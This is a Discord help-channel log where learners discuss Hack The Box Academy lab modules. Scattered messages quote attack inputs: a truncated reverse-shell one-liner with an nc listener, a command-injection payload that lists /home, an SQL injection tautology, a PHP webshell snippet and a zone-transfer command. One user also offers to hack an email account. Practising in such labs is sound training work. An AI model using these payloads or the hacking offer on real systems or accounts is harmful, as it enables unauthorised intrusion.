i just used this so i can give a proper error msg: nslookup -type=any -query=AXFR inlanefreight.htb @10.129.42.195(how do i add it as spoiler if needed???) and i get this errro msg: nslookup: couldn't get address for '@10.129.42.195': not found

thorn urchin
#

try @ the domain instead of the ip

#

I also generally use dig for my domain lookups instead of nslookup so not super familiar with their syntax

safe token
#

doesn't work. i'll check dig

granite prism
#

hello everyone, is anyone experienced with reverse engineering? if so i can further explain the problem and my approach so far. Thanks.

raven copper
#

what is bobs password on service scanning on getting started

green girder
#

Hi so Im currently on the HTB Academy Getting-Started module in section Nibbles - Initial Foothold, and it seems that I can't use the admin dashboard plugin my_image to upload the payload.php ... each time I try to save changes, the process stalls at the action of saving changes but does nothing. I've also tested this with another instance of the machine, which produces the same results. Any ideas? Also is this the right channel for this?

stiff stream
stiff stream
nimble ridge
#

Can someone help me get David's credentials so I can access Backup.vdh and complete password attacks - hard lab

green girder
#

@stiff stream Currently there is no error (the page seems to load indefinitely), and the format I used was a simple copy and paste of the ||"rm /tmpf;/mkfifo....."|| inside the payload.php file with the correct attacker ip and port for ||nc listener||

#

everything else works fine and loads right up
Edit: The indefinite reload resorted to a connection reset page from the plugins my_image save changes page.

warm sand
#

For the footprinting hard lab, can someone give me a hint/nudge once in the machine on how to connect to mysql since the user used to ssh is not allowed to? thank you
EDIT: figured it out, lmao

stiff stream
dawn leaf
thorn urchin
#

try again, exfil a diff method

green girder
stiff stream
vocal vortex
#

Hi there, I am looking for some assistance in the [Attacking Web Application with Ffuf] Module, Parameter Fuzzing .
So I have added both academy.htb and admin.academy.htb to etc/hosts, im using the correct list, the is path admin/admin.php?FUZZ=key. but still, i get back just user which seems to be a deprecated method. Any hints what do i miss?

lapis pivot
#

Hello πŸ™‹question in Web Server Pivoting with Rpivot section it saying
Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the..

I have done everything but no Flage showing in the webpage

warm turret
#

@gloomy tangle read the source code to get the right uploads folder

#

@stiff needle if you have 2 usernames in the format username.countrycode you should get the rest. The next part is to bf those creds with the right password policy from rockyou.txt search here in the channel i shared a password policy checker that i did to filter out the passwords for you

high dawn
#

has anyone done the Service Authentication Brute Forcing module here ?

#

i crafted a password list for Bill Gates but password is not in there

warm turret
#

@green girder nibbles can be pwned using metasploit. πŸ˜‰

green girder
opaque badger
#

Hi I’m working on the nibble privilege escalation box in the getting started module. I have done everything correct and have root but can not for the life of me find root.txt. Any suggestions?

high dawn
#

find / -name root.txt right?

keen dirge
#

Hey guys. I am having issues with the Archetype box in Starting Point. The nc64.exe will not get deployed to the mssqlclient that I am in. Is there anyone else that can help?

opaque badger
high dawn
uneven prairie
#

Can someone give me an hint for Firewall and IDS/IPS Evasion - Medium Lab ?

uneven prairie
#

ok thank you

onyx rapids
#

Brute forcing passwords module : skills assessment website - question 2

Can someone please explain to me what files to use for bruteforcing? I've tried a bunch and still no go and I'm starting to feel like things might be broken

lament tartan
#

this is what im trying to do but how can we retrieve the flag with enable_xp_cmdshell? also need admin privs? i got a reverse shell and tried a few exploits, such as the one suggested here but not working for me.. when using ||PrinterSpoofer|| to get a reverse shell, i get a connection but no command output was a problem with my instance, soon as it expired i repeated all the steps from notes and it worked first time πŸ™„

warm turret
green girder
warm turret
#

sadly i have no noteson any module i did so i can not give you the exact answers 😦

green girder
dusk beacon
#

hello everyone i am new here i am looking to get some practice here in is there a beginner module here

thorn urchin
#

@dusk beacon check any of the fundemental/tier 0 modules

high dawn
onyx rapids
high dawn
#

i wait 5 minutes per run

dusk beacon
#

where are the modules?

fallen osprey
#

I'm totally lost in "Information Gathering - Web Edition" WHOIS:

#

I have got the IANA ID Number correct. But I get lost on the question: What is the admin email contact for the venmo.com domain (also in-scope for the PayPal bug bounty program)

green girder
#

Ok so if a machine is not working as intended in the step by step academy module, who would I contact about it?

onyx rapids
high dawn
#

maybe username is just admin

high dawn
onyx rapids
fallen osprey
#

can anyone help me, please?

pastel ginkgo
#

Anyone else having issues sshing into remote targets atm?

#

I'm trying to remote to this workstation part of the shells and payloads where it just wants you to initially remote to the distant end then set up nc and practice setting up a shell but its getting stuck

#

when I run ssh with -v im seeing its waiting for a reply from the server

#

is the the htb vm bugged ?

pure rock
#

I'm having trouble opening a web page of a target machine

#

It's super slow and doesn't load the css

#

So i guess htb is "bugged"

pastel ginkgo
pure rock
#

Probably the server is overloaded or in maintenance

pastel ginkgo
#

Thats what im thinking I can't ssh to this remote machine at all and its part of the instructions to start the question

pure rock
#

I joined this server just to know if there is a problem with htb or i'm just dumb

fallen osprey
pure rock
#

I'm going to try again tomorrow, have a nice day

thorn urchin
pastel ginkgo
#

|| I think they might of removed it actually looks like it directs you to an email form now where the answer used to be and if you use a online tool now its redacted πŸ€” ||

copper coral
#

I have a quick question about the footprinting - hard lab if anybody is around to help.

copper coral
#

Basically having a problem getting anything back from snmpwalk. the machine is running v3, so v1/2 obviously wont work when trying to scan.
As far as i can see, V3 requires credentials to use w/ snmpwalk?

pastel ginkgo
copper coral
#

methinks onesixtyone πŸ˜„

regal sail
#

I've been stuck on firewall and IDS/IPS evasion - medium lab for a while. Is anyone able to assist?

onyx rapids
warm lichen
onyx rapids
warm lichen
#

That's only true if the credentials are literally in the last line of the text file

#

There's also the -t flag to run more parallel connections

onyx rapids
sleek brook
#

I am on the Password Attacks easy but having trouble as to what username list or password list we use?

regal sail
warm lichen
iron basin
#

Can anyone help on shells & payloads module, php webshell section? I know what the answer is to the first question however it is not accepting my input. I believe it is a format error

thorn urchin
tight mesa
#

hello everyone, I'm stuck in Predictable Reset Token under Broken Auth

#

anyone who can give me a hint

pearl island
#

I'm having trouble while trying to access the machine using RDP on the Introduction to Active Directory Module. Is anybody facing the same issue?

rustic sage
#

is it possible for youtube to be hacked?

thorn urchin
#

of course

fallow delta
coral onyx
#

hey guys, i need help i'm use kali linux but i download on my window 10 laptop but it don't work. i'm trying to use it for hack the box.

acoustic owl
# coral onyx hey guys, i need help i'm use kali linux but i download on my window 10 laptop b...

Updated video (Kali 2022.3): https://youtu.be/eLoxYXiQAPs
here's the latest version: https://youtu.be/GUyn8raW_JU
In this video, I will walk you through the installation of Kali Linux in VirtualBox on a Windows 10 PC. The version we'll be installing is Kali Linux 2022.1 . Kali Linux is an excellent tool for cyber and network security and comes w...

β–Ά Play video
raven copper
#

@stiff stream yeah I re read and seen it lol

fallow delta
#

anyone happen to finish the Tunneling, Pivoting, and Port Forwarding assessment? Currently stuck on question 6. Have creds and all but I'm not seeing other machines in one of the subnets

sleek brook
#

Need some hint on Password Attacks-Mutations section. The password list after mutation is around 94k. Brute forcing is taking time. Is this the intended way?

oblique parcel
coral onyx
warm turret
#

@coral onyx for windows 10, check on WSL, it is not as easy to setup a VM but you'll save plenty of resources, that is what i do

pearl island
pearl island
warm turret
#

@rustic sage youtube has been already hacked. The case i know, they used XXE over an AVI file upload and they did an LFI over the /etc/passwd on the youtube server. Luckily it was a white hat hacker. There shoul be a lot pf other bugs out there

solar zodiac
#

hi everyone πŸ™‚

warped bay
#

Hello everyone! I'm stuck at the "Network Enumeration with Nmap - Medium Lab", I know it's a pretty easy section but I tried many different options without success. The last command that i lounched included: port 53, decoys (RND:5), source port 53, UDP scan, script for grabbing the dns version, T 2 and other minor settings such as -Pn --disable-arp-ping

jagged zenith
#

@west rampart hey i send in htb academy

#

@west rampart i have blocked my account

oblique plaza
#

Hello everyone!!! I’m new to the community and I am working on the Three machine in Task 4 but I’m not able to get the sub-domain like it shows in the walkthrough. I had use different sub-domain list and still not showing

tight mesa
#

hello everyone, I'm stuck in Predictable Reset Token under Broken Auth, anyone who can give a hint

silver zenith
#

Damm wanna do the secure JavaScript doding module

#

Expansieve module haha

safe token
#

hey. coudl someone help me with the active subdomain enumeration in the information gathering - web edition module?

#

im tryin to get the A records with dig but i doesn't work :S

sleek brook
empty adder
#

Anyone who knows python?

cyan ferry
#

Struggling with a flag.txt on the "Using the Metasploit Framework"

I have attempted to utilize multiple exploits, to gain root access, but have been unable to gain shell. I am specifically am struggling with figuring out what exploit I need to run and why that one specifically. Any one have a bit of time willing to assist my ignorance?

warm turret
lethal atlas
#

@warm turret congrats

elder tapir
#

Hello, I am on the command injection module for bypassing blacklisting characters, the question reads:
Use what you learned in this section to find name of the user in the '/home' folder. What user did you find?

I have attempted several different payloads which should be working
127.0.0.1%0a${IFS}ls%09${PATH:0:1}home

but I cannot even get ls by itself to execute. I am not sure why. I am definitely targeting the right url, just nothing besides the ping command is showing up.

warm turret
lethal atlas
#

@elder tapir I couldn’t get PATH to work, try something different, I think I used COLOR

silver zenith
#

Why do I understand code better then the Dutch language?

rustic sage
#

I have a question about the SQLi module: given this query:
select * from users where username=admin OR '1'='1' AND password='password'

it says the AND goes before OR, so '1'='1' AND password='password' equals false, than it does the OR and because '1'='1' equals true, the OR is true.
So: Does the OR look only at username=admin or '1'='1', or does it compare username=admin or FALSE (because the AND condition equals to false)

#

because in that last case it doesn't really matter what you put in after the OR, even FALSE will work. But in the first case you need a TRUE statement after the OR

#

well, given the user admin does exist

frigid summitBOT
warm turret
#

@rustic sage actually you could say user=anything OR 'ANY_ID' = 'ANY_ID' -- - and it will show you the ANY_ID user. Usually the first admin created (id=1) is the admin and do not forget to use -- - to kill the SQL statement, otherwise it will still check for the password and you'll not achieve the SQLi

silver zenith
#

Just like Mary

#

It does some commando’s first

#

Just like math

#

I meant

#
  • before +
#

If ya know what i mean

rustic sage
#

yeah I got that, but does it only compare the '1'='1' bit in the OR or the whole AND condition ('1'='1' AND password='password')

silver zenith
#

Look at the diagram

#

In one of the sectio’s

rustic sage
#

that's what was confusing me πŸ™‚ the diagram shows it takes the whole ('1'='1' AND password='password'). But than it doesn't matter if you put '1'='1' or '1'='2'

warm turret
#

the AND it is never evaluated because you comment it using -- -

rustic sage
#

thanks for replying, but unfortunately I have to go 😦 will check back later

sleek brook
#

Id hate to keep posting the same problem but I am not seeing an end on enumerating the username 'sam' on password attack

high dawn
rustic sage
#

@everyone

#

what the mean @ everyone ?

loud sapphire
#

Hello,
Assessment on File Inclusion module.
Have the admin panel. Can see etc/passwd.

Thats it.. i am stuck. Can i get some help please?

onyx rapids
high dawn
onyx rapids
rustic sage
#

Hlo everyone

#

How are you

#

I am new participant

#

Can anyone tell about this website

#

And how to work

opal vapor
#

I am right now at the STACK-BASED BUFFER OVERFLOWS ON LINUX X86 module. On the Take Control of EIP part I need to submit the address of the EBP as the answer, but does somebody know at wich point I need to take the EBP address?

rustic sage
#

Oh oh oh

silver zenith
#

Can someone help me with attacking common webapplications osticket

silver zenith
#

Got a ticket and used the email received at gitlab

#

And im stuck

#

Bought another 200 cubes

#

Hhahaha

#

Step 1 complete module

#

Step 2 summerize and blog about the topic

#

Steo 3 hack a sinilair box

#

Then it will stuck in the brain

simple dragon
#

@onyx rapids on the skills assessment - website, did the script using 'rockyou.txt' say it would take 386 hours to complete??

frail jackal
cyan ferry
#

If you divide a /27 into subnets what would be the new cidr?

#

for each of them (considering all equal)

cyan ferry
#

I think you would be looking for /29

onyx rapids
simple dragon
#

im using the same username. it's been bruteforcing for at least 20minutes

onyx rapids
#

Check your password parameter, I think it should be pass instead of password

simple dragon
#

okay, lemme give that a go

onyx rapids
#

Reset the machine too just for the heck of it. hydra doesn't give any output when things don't work, so it's hard to know if something isn't working

simple dragon
#

that was it

#

thanks!

onyx rapids
#

No problem!

thorn urchin
#

For Attacking Common Services - DNS is there a particular wordlist to use for it? Ive found two subdomains besides ofc ns, but no flags on either of em and ive tried a couple different wordlists.

oblique parcel
#

@thorn urchin have you tried scanning each subdomain you originally found? If not try scanning them. It's definitely a "fierce" task

thorn urchin
#

Thats a different module

#

Im familiar with that fierce hint lol

oblique parcel
#

@thorn urchin oh your talking about the one after that one lol.

#

@thorn urchin is it the web one?

thorn urchin
#

not footprinting module, Attacking Common Services

#

though trying the suggestion anyways wouldnt hurt

oblique parcel
#

@thorn urchin I would have to look through them again but if it is public server then you could always scan it using a web based subdomain scanner.

thorn urchin
#

it isnt, thats what I did for one of the broken questions in a diff module lol

oblique parcel
thorn urchin
#

yup for the infamous triage question

#

but this one is all internal so that wont help

oblique parcel
#

I'll take a look and see what I can come up with after I finish this other module.

thorn urchin
#

the hint is pretty clear about what it wants you to use, but it doesnt find it

#

tells you to use subbrute, but the wordlist doesnt find anything I havnt already found. No extra records, no cname records that might leak other sources, no zone transfers on anything.

#

and yeah scanning for more subdomains on the ones I have found turned up nothing either

oblique parcel
#

And you did add the servers to your /etc/hosts?

thorn urchin
#

yes

#

no webservers running either

#

double checked that resources doesnt have a list for you to use either

west canopy
thorn urchin
#

zone transfers were denied for everything

#

unless literally one of the results in the sample is meant to be used as a test point in the question in which case thats absolutely terrible module design.

west canopy
#

This module was actually written by an AI so I tend not to question it. Once you get the answer I'll leave it up to you to decide πŸ˜‰

thorn urchin
#

nope didnt get me anything

west canopy
thorn urchin
#

ok

thorn urchin
#

tfw jared evaporates to dust after DMing him

west canopy
#

I am more like the girl from Alex Mac who turns into a puddle

warm turret
#

@simple dragon use the wordlists as they teach you in the sections, you'll find the answer in seconds. For the second password use rockyou10.txt as they suggest

#

Someone report @cyan ferry for SPAM plz

simple dragon
#

i made a namelist for harry with the username anarchy tool and then used cupp -i with only 'Harry' as the input. after that i shrank that cupp -i generated password list with the 'sed' commands in the sections. now im brute force ssh'ing. estimated wait time is 3hours

cyan ferry
thorn urchin
#

Yeah Im affirmed in my position that question is just a badly designed scenario question.

silver zenith
#

Biep

cosmic dock
#

For the Password Attacks - Hard lab, what wordlist did you use to bruteforce the vhd

formal pumice
#

hi

cosmic dock
silver zenith
#

Why didnt they call it duckyoy?

#

Biep

covert vault
# cosmic dock Ty

Hey, I was just reading through the messages in here and wanted you advice with the formatting for the easy lab? I found ftp and ssh with an nmap scan and have tried bruteforcing with the provided creds. Haven't had any luck though.

covert vault
#

Could anybody assist with the Password Attacks - Easy Lab? I am trying to brute force logins using the provided credentials but I am not getting any hits. Any suggestions?

covert vault
onyx rapids
#

Anyone else have trouble with Broken Authentication - Predictable Reset Token?
#modules message
I'm using this awesome Python script, and it still won't work!
I change the URL, and put the epoch in milliseconds, but no hits.

I get the epoch by taking the timestamp given on the website and placing it here https://www.epochconverter.com/
Tried the GMT and the Local option, but doesn't change a thing

thorn urchin
#

So did the Attacking Common Services Easy lab and got the flag, but theres a hint about a second method of getting it. Anyone want to help enlighten me what the alt method is?

#

ftr my route was the ||outfile|| route

#

I suspect something involving ||rdp|| but Im not certain since I hit a dead wall there

quasi wave
#

hi

#

I think that I need to ask

#

I am having trouble with this one question and would like a hint

#
Determine what user the ProFTPd server is running under. Submit the username as the answer.

I have trouble with this.

quasi wave
#

nevermind I solved it

wheat garden
#

any one finish Password Attacks Lab - Hard? Im stuck but I found J's credentials though when I try to use them via xfreerdp keep getting errors. Get same errors in the pwn box too. Wanting to make sure im not experiencing some technical issue.

loud patrol
warm turret
#

@loud patrol #SPAM

#

@onyx rapids it is a tricky question, you should check the timestamp of your own token, including the miliseconds (*1000) from there you increase miliseconds by 1 to bruteforce the qdmin token

#

@covert vault wich section?

#

@simple dragon try filling the entire name and lastname to generate the passwords wordlist.

#

And @simple dragon use the policy checker i shared. It is better and easier than the sed command. Almost the same results

covert vault
pearl island
unborn summit
#

https://academy.hackthebox.com/module/details/143

hey guys i was just wondering if the Active Directory Enumeration and Attacks module includes things such as the golden/silver ticket attack. I know it probably does but want to make sure before i get the module.

wind egret
#

So, I'm going through the javascript deobfuscation module as part of the getting started process, and it's asking me to go to a url shown, but the url is just http://SERVER_IP:PORT and is that normal? >.>

warped bay
# warped bay Hello everyone! I'm stuck at the "Network Enumeration with Nmap - Medium Lab", I...

Just solved this ("Network Enumeration with Nmap - Medium Lab"), for others that might be in my situation: just use THEIR pwnbox, don't use your kali... In my opinion challenges must always have a solution that's independent from the attacking machine, to be obligated to use their parrot in order to solve this is a design fault. At least it should be specified in the task what to use

vital adder
#

i'm back

#

and... window is installed on the wrong drive also all of my VMs is wiped so bye guy (for today)

#

also i got 15 dm anyone still need help ping me again

wind egret
rich mulch
#

Hi guys I am confused about SMB. I got a list cred, I used both hydra and smbexec to bruteforce loging. Hydra told me that server denied but smbexec can bruteforce. So what is the reason?

languid dawn
#

have you used the -vV option for hydra?

#

Actually scratch that, what's your hydra command?

#

(without spoilers please)

odd kayak
#

Hey guys I am new here πŸ˜…

#

I have some doubts as beginner for learning ethical hacking

vital adder
#

try this if you are new https://www.youtube.com/watch?v=lhz0-qAQlBM also i recommend tryhackme to start

Sponsor: https://go.intigriti.com/thecybermentor
Blog Post: https://tcm-sec.com/so-you-want-to-be-a-hacker-2022-edition/
Academy: https://academy.tcm-sec.com

Timestamps:
0:00 - Introduction
0:53 - Intigriti Sponsorship
1:55 - Building a Foundation
2:10 - Important Notes
5:37 - Basic IT Skills
8:28 - Networking Skills
12:38 - Linux Skills
17:04 ...

β–Ά Play video
odd kayak
#

Yeah I had already seen it

#

But still have little doubt πŸ₯²

languid dawn
#

your best bet is to try out different topics, and see what you like

red obsidianBOT
languid dawn
#

this is a good first look at what you can do

#

also go over to Pico gym and try the PicoCTF challenges

#

they have writeups you can search for on github/ctftime

vital adder
#

tryhackme have some free stuff beginner if are still doubting about putting money in then give that a try

odd kayak
#

Wait wait .... atleast listen my doubtπŸ˜…πŸ˜…

languid dawn
#

Starting point on HTB will teach a good methodology and introduce some nice concepts

vital adder
#

oh yeah that too

gilded gale
#

hello

#

i need help

#

πŸ˜…

languid dawn
#

and remember, the last 2 retired boxes are free on HTB and they have writeups, either from users or from HTB (ippsec does them in video format)

languid dawn
odd kayak
#

My doubt is ......What should I know from a programming language...... should I learn every language in advance

languid dawn
#

you don't need to learn a language first

#

you will need to pick up bash and powershell, and probably python

gilded gale
#

i was solving the reponder box from htb but when i run the tool responder it doesn't capture the ntlms?
can anyone help?

vital adder
languid dawn
vital adder
#

oh

odd kayak
languid dawn
#

then that's fine

vital adder
#

for hacking you just need to learn about the scripting path no need to learn how to build something

odd kayak
#

ErmmmπŸ˜….... what's the scripting path....what it mean

languid dawn
#

just making simple scripts.

odd kayak
#

Okay Yeah I can make😐

languid dawn
#

can be done in bash or pythjon or perl, or whatever

odd kayak
#

What else should I do ?? Now

languid dawn
#

the best thing is to start so you can get a feel for what you like hacking

odd kayak
#

Wait I want to tell u that

languid dawn
#

CTFs are challenges in bite sizes, so PicoCTF is a great starting block

odd kayak
#

How Can I find PicoCTF

languid dawn
#

Hacking boxes will go through exposed services or vulnerable websites to gaining full control of the server, so that might also be more your thing

odd kayak
#

Okay ...I see

lament tartan
#

wonder if HTB has ever thought about using regex πŸ€”πŸ˜…

#

even trimming spaces from answers should be super easy πŸ™„

odd kayak
#

But I want to learn hacking the server sides

#

So is it enough to learn python

#

πŸ™„πŸ™„πŸ˜¬πŸ˜¬

languid dawn
#

yes

vital adder
languid dawn
#

try out our starting point for example, it has writeups. Or try out the last retired boxes and follow along ippsec's videos

#

it'll teach you some basics and most importantly the methodology

#

methodo is 80% of the work

odd kayak
#

Woo okay😐

#

Ippsec's videos can I find it in YouTube???

languid dawn
#

yeah so, hacking is mainly having a good methodology, and LOTS of trial and error

languid dawn
#

and reading docs, and learning.

odd kayak
languid dawn
#

could be anything, from the language you're trying to exploit, such as in a C program that accepts user inputs, to an apache server

odd kayak
#

U mean I have to learn C too

languid dawn
#

docs often tell you what misconfigurations to avoid, which means if it's present you can exploit it

#

or a sillier example that unfortunately happens, docs list the default passwords and login for admin Kappa

#

you don't have to learn C

#

you have to learn to eventually exploit C's language features when a dev makes a mistake

#

but it's true of any language.

odd kayak
#

Okayy😐

languid dawn
#

a dev can make a logic error that let's you reset the admin password from your user account for example.

#

that could be in any language, but that's irrelevant to your exploit

odd kayak
#

Yeah yeah that's what I want to tell uπŸ˜…πŸ˜…

#

If I want to exploit something....then if that something is in other languages which is never i had learnt......that ....then what can I do on that case πŸ™„

languid dawn
#

that's when you use google and read the docs πŸ˜‰

#

that's what we all did

#

and do

odd kayak
#

OkayπŸ˜…

#

Ermmm can U share me some docs....that may help me out to know something πŸ˜…

languid dawn
#

you must learn to do your research for a lot of things, and for others well, you can only try and fail until you succeed (or not, sometimes it's not a vuln)

#

https://book.hacktricks.xyz/ this could help you.

Welcome to the page where you will find each hacking trick/technique/whatever I have learnt from CTFs, real life apps, reading researches, and news.

odd kayak
#

Okayy tq dudeπŸ˜‰

#

Hey bruhh....can U explain me more as a beginner πŸ˜…πŸ˜…....I want to know something more

tight mesa
#

hello everyone, anyone who can let me know where I can find a wordlist for guessable answers..!!!

#

I'm looking for this kind of wordlist to try to solve the guessable answers exercise under Broken Auth module..!!!

#

thanks in advanced

vital adder
tight mesa
#

ok., for non English native speaker is not hard to find the right question?

vital adder
#

i'm also not a English native speaker and the first time i do this i did have some trouble finding the right question

#

if you still have issue with that try to note down all of the question and try to guess each one to see with one is the most guessable and if you still need help with that shoot me a dm

rich mulch
#

I guys, why hydra fail but crackmapexec can bruteforce ?

lucid wyvern
#

Hashcat module Combination Attack question is not accepting the cleartext answer, anyone around?

acoustic owl
vital adder
vital adder
lucid wyvern
#

Yup

#

Hurt your teeth bitng the rest πŸ˜„

vital adder
#

oh and i should mention this i did help one guy with this module (not this section) and even with the right answer htb still won't accepted and support can't help because they can't re-create the issue but the rest of the section is fine for him

lucid wyvern
#

So no cubes on this section 😦

vital adder
#

so if you want me to double check dm me the password you found if that still doesn't help i think you should contact support

lucid wyvern
#

Yeah I'll DM just to be certain.

#

Cheers @vital adder weird bug fixed.

rich mulch
rich mulch
vital adder
#

I mean the latest version of hydra will have some issue with some newer version of SMB if that the case updating your machine or hydra won't help

rich mulch
clear saffron
placid quest
#

@rich mulch use xhydra

safe token
#

hey. im doin the windows fundamentals - windows services and processes. my question is: Identify one of the non-standard update services running on the host. Submit the full name of the service executable (not the DisplayName) as your answer.
how can i get the services executable name? i think i found the services that i need but idk how to get the executalbe nem

wind gust
#

Just finished AD module. HOLY.. so much relief lol.

unique valve
wind gust
rustic sage
#

hey guys i am stuck at web request module

formal monolith
#

hello i cant verify even after changing my settings

vital adder
rustic sage
formal monolith
rustic sage
vital adder
# formal monolith i did tho

no idea why they removed the community help channel but try asking this in the new community help thing (include the setting you change)

vital adder
frail jackal
west canopy
#

welcome back @vital adder πŸ˜‰

lethal atlas
#

hey jared, do you have any info on the ctf stuff?

cyan ferry
foggy light
#

I have just completed the first module of File upload attacks
I used this shell || "<?php echo gethostname();?>" > ||
But I was wondering if there is any other way to get the hostnames?

simple dragon
#

anyone else experiencing incredibly slow fuzzing in the modules? i'm in the ffuf skill assessment - web fuzzing. im running a recursive fuzzer on the subdomains with directory-list-2.3-small. it's scanning around 10/sec with 100,000 to check. there's no way that's normal

lucid wyvern
#

Hashcat module has been giving me a hard time today. I keep cracking but get wrong answer (they have been correct). Fixed earlier with hard refresh. Has anyone completed it so I can compare a cracked hash for the hybrid section, please. UPDATE: I know how to fix the bug. Turn it off and on.

simple dragon
#

nvm resetting my host and target fixed the issue

marble raft
#

Hi guys! Can someone help me on Remote/Reverse Port Forwarding with SSH? i've been trying to reproduce the remote shell like the example but for some reason mine just instantly closes.

crisp remnant
#

someone for a question about the attacking common applications module ?

raven cairn
#

Can I have some help for Footpring Imap/Pop3

#

I am able to login into the IMAP server

#

And able to select inboxes

#

but Cant read messages

#

IMap commands feel super cluncky

marble raft
#

Which command you're running to read the messages @raven cairn ?

marble raft
#

Try A1 FETCH MsgNumber all @raven cairn

#

Or if you feel like it try using a e-mail gui like evolution, but you have to configure with the proper ip, username and pass

raven cairn
marble raft
#

sure!

rustic sage
#

Hey I need help for the module footprinting in the smtp section. The second question Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.

I'm trying to use metasploit by searching the banner than I found in the in the first question and I metasploit found noting. If I do a search SMTP theres a lot of results and I'm not really sure to know wich one should i use. I've been trying somes exploits and none of them worked.

slow ruin
#

anyone experience this error when trying to pivot to the jason Windows server in PIVOTING, TUNNELING, AND PORT FORWARDING - RDP and SOCKS Tunneling with SocksOverRDP?

I was able to connect once and when I clicked to read the flag the connection dropped before I was able to copy and paste the flag for the answer

slow ruin
atomic totem
#

Anyone free to assist on "Attacking Enterprise Networks - Post-exploitation" Having problems with the double pivot.

sturdy igloo
#

need help with linux privesc assessment flag4.txt. anyone i can dm to ask questions so not to ruin it in the main chat

#

cant bruteforce password for ||tomcatadm|| using metasploit scanner or mgr_brute.py

warm turret
#

@foggy light you can use the system function of php and with the RCE you use the hostname of linux command

#

You can also read the /etc/hostname file

sturdy igloo
lethal atlas
#

if I get it I will let you know

safe token
#

guys. where do i find this?
What 3rd party security application is disabled at startup for the current user? (The answer is case sensitive).

west canopy
#

anyone else getting pwnbox lag?

iron basin
#

I did on my Nomachine vm in the pwnbox but that might be due to different reasons @west canopy

#

Also, does anyone have any advice as to why I cannot change directory on a host that I was able to get a shell on? It is a windows machine that is apart of the Shells & Payloads live engagement module. I gained a shell however I am not able to get out of the current directory. I am assuming it is because I do not have the correct permissions.

thorn urchin
#

in linux the backslash is used to escape special characters so theyre read as the character and not whatever special operation they preform. This makes the backslash itself a special character. So to use the backslash itself you need to escape it, leading to doubling up the number of back slashes you need

marble raft
#

Hi guys! Can someone help me on Remote/Reverse Port Forwarding with SSH? i've been trying to reproduce the remote shell like the example but for some reason mine just instantly closes.

wind gust
thorn urchin
#

Does the attacking common services Medium lab have multiple paths through it or something because that was like trivially easy, like way more so than the easy lab was πŸ˜‚

#

I felt like I barely started the box and then bam the flag was right there

#

@west canopy Im dying to know when you get the chance if theres a much longer normal route for that medium lab and I just found the shortcut route that rewards people for good enumeration or if thats supposed to be the intended primary route all along.

west canopy
#

maybe the two got mixed up lol

thorn urchin
#

yeah definitely, I feel like they should be switched lol

west canopy
#

right

thorn urchin
#

cause easy lab has you exploiting and leveraging partial permissions across multiple different services to get access to the machine and the flag. Medium lab is just 'dont be lazy and itll be right there in your face, you dont even need to compromise the box'

west canopy
#

yes I think there might have been a glitch when the AI developed these sections

thorn urchin
#

This module has so many oddities im starting to believe youre not BSing me that an AI helped generate the module.

west canopy
#

it really is an experiment πŸ˜‰

rugged dagger
#

Alright, the Pwnbox won't start and I'm not installing npm on my machine.
Does anyone have somewhere to point me for their "start a web server" question?
Cuz apparently no combination of start, serve, run, run server, -p, --port, -- --port, or 8080 is the correct answer.

#

And daddy Google doesn't understand why you'd be entering this is a cli to begin with it seems. lol

#

Too slow, found it finally. lol

unique valve
delicate otter
wheat garden
wind gust
#

anyone got this error for SPLUNK reverse shell?

formal wigeon
#

I need help if I can get it

#

Its something I need for my future.

#

I don't have money. But I need someone to help me out in my situation.

hazy grotto
#

Does anyone else feel like an idiot when trying to figure out the subnetting questions? I watch so many videos and just when you think you are starting to understand.... it disappears.

wheat garden
formal wigeon
#

Message me if want to hack a lil email for free

tight mesa
#

is there anyone who has made the Brute Forcing Cookies exercise, question 1 under Broken Auth module?

thorn urchin
#

alrighty onto the pivoting module, this one sounds like its gunna be one of the first modules where just brushing my rust off wont be enough to just speedrun the module.

hazy grotto
#

Would anyone be will to point me into the right direction on HOW you get the answers for the subnetting questions in Intro the Networking?

I understand the 2nd one but my brain is mush after trying to figure it out.

wheat garden
#

any one available to help or give me a hint on the password attacks lab- Hard?

wheat garden
hazy grotto
#

Can someone block this member?

thorn urchin
#

<@&861185840277487616>

wheat garden
low girder
thorn urchin
#

yup! thanks

west rampart
#

yup

hazy grotto
surreal rain
#

πŸ‘

wheat garden
# hazy grotto So you don't think this would be useful to understand in any way?

the module explains the conecpts behind them pretty well and I understand what they are theyre splitting the I.P address into more potential used adresses . But in my real world application I just use the subnetting calculator tools to calculate them. But yes you should understand the fundemental concepts of what they are.

wheat garden
hazy grotto
orchid ingot
#

Module: Shells & Payloads
Section name: Skills assessment

Hi, I have trouble with NoMachine connection because it's really unstable. Has anyone encountered something like this? Any advice?